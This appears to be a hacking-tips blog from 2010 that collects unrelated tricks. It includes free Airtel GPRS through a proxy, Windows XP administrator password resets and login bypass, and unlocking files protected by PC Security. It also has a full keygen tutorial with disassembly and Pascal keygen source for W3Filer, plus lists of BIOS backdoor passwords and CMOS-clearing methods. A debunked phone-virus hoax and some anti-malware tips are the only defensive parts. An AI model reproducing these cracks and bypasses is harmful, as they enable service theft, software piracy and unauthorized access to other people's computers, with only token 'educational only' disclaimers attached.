Friday, February 5, 2010

Free Airtel GPRS From Your Mobile Or PC

Requirements


You require a PC or a Laptop and Serial/USB cable OR Infrared Device OR Bluetooth dongle in order to first connect your phone with your computer.


Step By Step Procedure: 


1)First Activate Airtel Live!( It is FREE).


2) Create TWO Airtel gprs data accounts in your mobile and set the
FIRST one as the active profile.

3)Connect your phone with your connectivity cable using blutooth dongle or usb/serial cable.

4) Go to control panel and create a new dial up connection.
Connection Device : Your mobile’s modem
ISP Name : Anything you want to enter.
Phone Number : Your mobile number.
Password: blank

5) Now setup your browser at your pc to use the proxy
100.1.200.99 and port 8080.

6) Connect to the dial-up account.

7) Try on your mobile and access any site. You will get “Access
Denied…”. Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and WAIT for some minutes.

9) That’s it done ! now you can open any page on your pc for free.
I hope these settings may work please let me know if you have any problem by leaving a comment here.

AirTel Free Miss Call Alert !

Kerala : call *62*+91567#

Tamil Nadu : *62*+919894035100#

Mumbai : *62*+91560#

Maharashtra : *62*+91560#

Gujarat : *62*+91567#

Tested in Kerala, Working.

Remove Password Without Current Password In XP !

  • Press Win + R -> type cmd.exe in Run ->
  • Type net users and hit enter.
  • CMD will shows the User Accounts in the system.
  • If you want reset administrator password then type net users "administrator" * and hit enter 3 times.
  • Now Administrator is free without password.

Simple Trick in Windows XP : Login Without Password

Boot your XP -> [Logon screen] Press CTRL + ALT + DEL -> [Classic View of Logon Screen] User Name : administrator _ Password : [nothing] -> Hit Enter.


Thursday, February 4, 2010

Some Hoax Messages

Version 1
To: ALL ORANGE USERS



If you receive a phone call and your mobiles phone displays ACE-? on the screen DON'T ANSWER THIS CALL - END THE CALL IMMEDIATELY. IF YOU
ANSWER THE CALL, YOUR PHONE WILL BE INFECTED BY THIS VIRUS. This virus will erase all IMEI and IMSI information from both your phone and your SIM card, which will make your phone unable to connect with the telephone network. You will have to buy a new phone. ? This information has been confirmed by both Motorola and Nokia. There are over 3 million mobile phones being infected by this virus in USA now.

You can also check this news in the CNN web site. ?

Please forward this piece of information to all your friends

Warm Regards,

Version 2
Dear all mobile phone's owners,


ATTENTION!!!

NOW THERE IS A VIRUS ON MOBILE PHONE SYSTEM..

All mobile phone in DIGITAL system can be infected by this virus..If you receive a phone call and your phone display "UNAVAILABLE" on the screen (for most of digital mobile phones with a function to display in-coming call telephone number), DON'T ANSWER THE CALL. END THE CALL IMMEDIATELY!!!BECAUSE IF YOU ANSWER THE CALL, YOUR PHONE WIL L BE INFECTED BY THIS VIRUS.. This virus will erase all IMIE and IMSI information from both your phone and your SIM card which will make your phone unable to connect with the telephone network. You will have to buy a new phone.

This information has been confirmed by both Motorola and Nokia..
For more information, please visit Motorola or Nokia web sites:
http:/ /www.mot.com
http:/ /www.mot.com or http:/ /www.nokia.com


There are over 3 million mobile phone being infected by this virus in USA now. You can also check this news in CNN web site: http://www.cnn.com..

Please forward this information to all your friends who have digital mobile phones..

Mobile Phone Virus Hoax

Forwarded messages claim that a destructive virus will infect your mobile (cell) phone if you receive a call that displays "ACE" or "XALAN" on the screen (Full commentary below.)



Status:
False

Example:(Submitted, 2004, 2005)
Subject: FW: URGENT message for mobile phone users!!!


URGENT message for mobile phone users!!!Please be careful and mindful! All mobile users pay attention if you receive a phone call and your mobile phone displays ( ACE ) on the screen don't answer the call. END THE CALL IMMEDIATELY if you answer the call, your phone will be infected by a virus. This virus will erase all IMEI and IMSI information from both your phone and your SIM card, which will make your phone unable to connect with the telephone network.

You will have to buy a new phone. This information has been confirmed by both Motorola and Nokia. There are over 3 Million mobile phones being infected by this virus in USA now. you can also check this news in the CNN web site.

PLEASE FORWARD THIS PIECE OF INFORMATION TO ALL YOUR FRIENDS.

Another one

All mobile users pay attention!!!!!!!!!

If you receive a phone call and your mobile phone displays(XALAN)on the screen don't answer the call, END THE CALL IMMEDIATELY,if you answer the call,your phone will be infected by a virus. This virus WILL ERASE all IMEI and IMSI information from both your phone and your SIM card, which will make your phone unable to connect with the telephone network. You will have to buy a new phone. This information has been confirmed by both Motorola and Nokia. There are over 3 Million mobile phones being infected by this virus in all around the world now. You can also check this news in the CNN web site.

PLEASE FORWARD THIS PIECE OF INFORMATION TO ALL YOUR FRIENDS HAVING A MOBILE PHONE.




Commentary:
Variants of this hoax have been circulating since 1999. The information in the email is completely untrue and has certainly not been "confirmed by both Motorola and Nokia". If a virus had really destroyed the mobile phones of 3 million US users it would be a major news story around the world. There is nothing on the CNN site about this virus nor does a search of Google News reveal any articles that confirm the story.

However, there are legitimate news articles about a real mobile phone virus that was discovered back in June 2004. This worm, dubbed "Cabir" is basically a "proof of concept" virus and does little damage. Vnunet.com reports that the first outbreak of this virus "in the wild" occurred in Singapore in early October. Although Cabir is virtually harmless, it does indicate that mobile phone virus attacks are possible and may become a significant threat in the future. News of Cabir may also be giving new life to this old mobile phone virus hoax.While mobile phone viruses are real, experts maintain that the potential threat of such viruses has been exaggerated.

In any case, the information included in these emails is false and the "warnings" should be deleted without forwarding. Any "virus warnings" received via a forwarded email should not be taken at face value. Always take the time to confirm the information at a reputable anti-virus website.

An older version of the hoax:
ATTENTION!!!

NOW THERE IS A VIRUS ON MOBILE PHONE SYSTEM. All mobile phone in DIGITAL system can be infected by this virus. If you receive a phone call and your phone display "UNAVAILABLE" on the screen (for most of digital mobile phones with a function to display in-coming call telephone number), DON'T ANSWER THE CALL. END THE CALL IMMEDIATELY!!! BECAUSE IF YOU ANSWER THE CALL, YOUR PHONE WILL BE INFECTED BY THIS VIRUS.

This virus will erase all IMIE and IMSI information from both your phone and your SIM card which will make your phone unable to connect with the telephone network. You will have to buy a new phone.

This information has been confirmed by both Motorola and Nokia. Formore information, please visit Motorola or Nokia web sites: http://www.mot.com or http://www.nokia.com .

There are over 3 million mobile phone being infected by this virus in USA now. You can also check this news in CNN web


References:
http://www.f-secure.com/hoaxes/cf_virus.shtml
http://www.symantec.com/avcenter/venc/data/mobile-phone-hoax.html
http://www.technewsworld.com/story/39291.html

Check storage capacity of fake USB flash drive

Hi,

I also bid for one of those wonderfully inexpensive massive capacity flash drives and received an USB flash drive that tells me it's 8 GB. But in fact it's not. It only holds 4GB of capacity.

My flash drive was labeled with an 8GB checkmark on the box and an 8GB sticker on the stick itself. Very promising. And when I plugged it in, my Antivirus program reported the virus win32:Perlovga and a Trojan-Downloader named Win32:Small-btx found in the two files copy.exe and host.exe that were both stored on the stick. The autorun.inf also stored on the flash drive tried to infect my computer system by executing the copy.exe command.

My USB stick is formatted with FAT32 and is an Alcor USB 2.0 model. The product shows itself as 8GB under Windows XP.

Besides, the product was advertised with a data writing speed of up to 7 MB/s. In reality it is much slower (yes I have USB 2.0 :) and writes data only with 12 MB/s (maximum).

Ok, here is how I checked for the stick's capacity, read and write speed and found out that mine is a fake:


1. Download the free version of the tool
Bart's Stuff Test 5
Version 5.1.4
(search for this with google, I am not sure if I am allowed to post a link here)
2. Don't plug in your flash drive yet.
3. Disable the Autorun feature of Windows XP first.
4. Plug the stick into an USB port (Warning: have your Virus signatures of your antivirus program updated first, just in case).
5. Don't open anything on the stick. Do not doubleclick on the stick.
6. Format the stick to get rid of any potential viruses or malicious tools.
7. Run Bart's Stuff and select the stick under "Folder"
8. Start the test. It will write a sequential file that will fill the stick up to > 90% of it's capacity and then it does read back the written data.
9. Check the Bart's stuff status written total when you get an error message like this: "An Error occurred. WriteFile returned an Error. There is not enough space on the disk".

My stick ran out of space at 4 GB exactly, Bart's Stuff filled the stick up to 52 % of it's fake capacity. But: Since the FAT32 maximum supported file size is 4GB, this method would not work on flash drives with more than 4GB of capacity. Larger size sticks should be filled up with large files that are compared against their originals to see if some errors occur.

But I found another indication that proves the stick I have is a fake:

Windows XP sees it as 7.95 GB capacity with 8,539,680,768 bytes. This is too much reported space.

I also own a non-fake 8GB flash drive (not an ebay deal). This real 8GB stick is reported by Windows XP as 7.73 GB capacity with 8,304,717,824 bytes. Since flash drives always give you less than the advertised storage space, this 7.73 GB seems to be about right for my real 8GB flash drive.

Next step if you own a fake flash drive: If you can, file a complain with paypal to try to get your money back.

There is another very useful utility that can help to check for fake USB sticks, it's called H2testw ( -- by Harald Bögeholz / c't Magazin für Computertechnik , can be be downloaded at the heise dot de download site). The readme is in German, yet the program can measure the write and read speed, too. On my fake 8 GB stick, I only get about 1 to 3 MB/s write speed which is an indication that there is something really weird going on here. the Utility sees the USB stick as 8144 MB in size when empty which is totally impossible, another hint that it was manipulated. Don't forget to delete all test data from the stick when you are done.

Change the administrator password from a limited account in XP?

Many people use computers with Windows XP and have limited users and they have forgot the administrator password, this article can help them find the password.

f you have forgotten the administrator password for the Windows XP operating system, it would be very hard for you to login and it might become a disaster for you, because you might lose a lot of information and it might take a huge amount of time to recover your critical information.

In here I am going to introduce two methods, with the least demand to know about the computer security systems,

Method 1:

This method has worked at least in 50% of the circumstances occurred to me,

A. Turn on the PC,

B. When reached to the login page, press Alt+Ctrl+Del buttons, A dialog box apears, in the "User name" enter: administrator and leave the password box empty, press ok!

If you have not previously set administrator password you can easily login ad\nd change your password

Method 2:

This method has always been successful for me! But to use this method you have to have a bootable Windows XP CD.

A. Turn on the PC and put the bootable Windows XP CD in the CDROM tray

B. Set the boot sequence in such a way that it checks the CDROM Device for first boot device

C. Then while the message: “Press any key to boot from CD" appears press any button.

D. When the Licensing Agreement comes - Press F8 to agree it.

E. Setup screen which gives the option to do a Repair or install a new version, press repair.

F. Wait the Repair finish the first step.

G. Then the PC restarts automatically, this time while system is booting, don't press any button to boot from CD,

H. Windows will start copying the files and after the copy, when the message "Installing Devices" appears in the progress bar press "SHIFT + F10" then a console opens.

I. You can now change the password, in the console type: NUSRMGR.CPL, a dialog appears, change the password

J. when the repair process finished you can login with the admin password.

How to make keygens?

How to make key generators?
-===========================-
Introduction
------------
I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.
Hi there, in this tutorial, I intend to teach you how to make a pretty
simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...
I guess some of you might know the program.
I`ll assume you know:
A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler (This knowledge can help).
D.Assembly.
E.How to code in Turbo Pascal (tm).
Tools you`ll need:
A.SoftIce 3.00/01 or newer.
B.WD32Asm. (Not a must).
C.The program W3Filer V1.13 (if not provided in this package), can be found in
www.windows95.com I believe.
D.Turbo Pascal (ANY version).
Well, enough blah blah, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
We notice this program has some kind of serial number (Mine is 873977046),
Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.
Well, now, let's put your name and a dummy reg code...
set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...
I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A2FB(C)
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A2E8(C)
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
to
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A30F(C)
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
checking).
===================================================================================
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
===================================================================================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A333(C)
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user name, offset EAX. :0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX. :0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX HMMMMMM, What's in
here?????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
our SERIAL NUMBER! (PLEASE, take
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040A374(C)
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret
Making the actual Keygen
~~~~~~~~~~~~~~~~~~~~~~~~
Now, after I've explained how does the program calculate the registration
code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
That's it, here's the source of my keygen:
------------------- Cut here ---------------------------------------------
Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex; If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.

PC SECURITY HACK

1. Information here is only 4 educational purpose nd u shall be responsible 4 all the damage if any or legal shit that u may Find yourself in ;while using the info here( like an asshole)
2. u understand that u r using the info here 4 yourself only nd not 4 harming anyone in anyway or invading privacy of others. It is also acknowledge that u will not using information here to do anything illegal 4 I shall not be held responsible 4 anything.

What is PC Security?
It is a very good software 4 password protecting ur files , folders , drives ,programs nd 4 that matter the whole computer by www.tropsoft.com.

What can this guide do 4 me ?
Not much but it can help u to open a file protected by PC Security ver.5.1 under
Certain conditions.

What do u mean by "under certain condition" ?
Well u can access file protected by PC Security v5.1 only when the locked file is kept in a folder which is not protected that it is u can see the file kept in a folder nd when u click the file(protected file) it gives u strange messages like " access denied "or the "file is used by another program "which tells u that the file is protected .

How can I unlock files protected by PC Security nd what all do I need 4 it ?
Well all u need is a program called MAGIC FOLDERS nd a cup of coffee to drink while u play. I have used version 1.31You can get MAGIC FOLDERS here www.pc-magic.com
Now find the file that u want to unlock nd see in which folder it is kept nd now



Open magic folders (make sure that u install magic folder before doing all this nd make sure that u don't use the feature called encrypted magic folder which comes with it ;usually it does'nt automatically encrypt the folders but make sure that it does
Not do it automatically (I hope it would 'nt do it automatically as it does'nt do with mine) If you're using a non-english version of Win95/98 u may need the english version of the VB5 runtime files. u can get them at:

http://pc-magic.com/dl.htm if cannot install the magic folder on ur PC u need to download some dll files from above mentioned site.

Now that u have installed magic folder open it nd hide (make that folder invisible )the folder in which locked file is kept nd close the program nd shut down ur computer now when u will reboot then again open the magic folders now u should make the folder that u have just made invisible visible ie. Folder that u have made invisble before rebooting the system now make it visible again nd now open the folder nd click on the file Congrats fh !! the file is opened nd now u have full access to the file.

How Not To Get Hacked

Protect Urself !
Follow These Simple Guidelines n u are done

*** Under the security option tab of Mozilla Firefox there is an option Show Passwords make sure its protected by the master password.

1. U may avoid using Internet Explorer(old versions) and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus,

5. Boot into safe mode and run all three scans (once in a month)

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it, at least quarantine it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your major passwords, mostly bu using a virtual keyboard(to prevent keyloggers).

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

Good luck!

Extra BIOS Reseting Tricks

Replacing the chip


If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.


Important

Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .



Key Disk for Toshiba laptops


Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.


Key protected cases


A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

That's all.

Clear Cmos, jumper.That is the way how I solve problem when customer forgets password.


More

There are a few different ways to reset the cmos, here's a few:

1. there are many default common passwords,
such as:

At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)

For Award BIOS' try these backdoor passwords:

AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx

For AMI BIOS' try these backdoor passwords:

AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO


For PHOENIX BIOS' try this backdoor password:

phoenix

there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)


2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.

3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.

4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)

5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.

6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:

http://www.11a.nu/ibios.htm

http://natan.zejn.si/rempass.html

Good reading:
http://www.astalavista.com/library/...ios_hacking.txt


http://www.virtualplastic.net/html/misc_bios.html


Tools:
http://www.red-demon.com/pwrecovery.html


A CMOS password, if present, is one that you must enter when the computer is booting up. It comes before a network or operating system password. You will not be able to run any programs, view files or even enter the operating system if you do not enter this password. If you find you'd like to change the password, this can be done by restarting your computer and entering the CMOS setup. CMOS setup is usually entered by typing a certain key or combination of keys as your computer is booting up. The DEL (delete) key or Ctrl/Enter are common ones. However, your BIOS should show a line explaining which key(s) to type to enter SETUP, BIOS SETUP, OR CMOS SETUP. There should be a password option in the setup program. If you are not able to find this option you will need to consult the manual that came with the computer or motherboard. If you have forgotten your password you will need to clear it by physically changing jumpers on your motherboard to short out certain pins, thereby erasing the password. The location of these pins varies from motherboard to motherboard, so you will need to refer to your computer or motherboard's manual. Some motherboards have a default password. For example, the AMI BIOS default password is "AMI". Check your computer or motherboard manual for the default password. It's worth trying this password if you don't know, or have forgotten the CMOS password. Some older computers required you to have a "reference disk" in order to make changes to the CMOS settings, which would include the password.

Flashing BIOS via hardware

If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.


Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.

To find the correct jumper you should read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.


In Laptop


Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.


Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)


Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
gnd
74
|__________________
5v 75--| |
| |
| |
| CHIPS |
1 * | |
| P82C206 |
| |
| |
|___________________|
| |
| gnd | 5v
12 32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
80 51
|______________|
81 -| |- 50
| |
| |
| OPTi |
| |
| F82C206 |
| |
100-|________________|-31
|| | |
1 || | | 30
3 26


Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
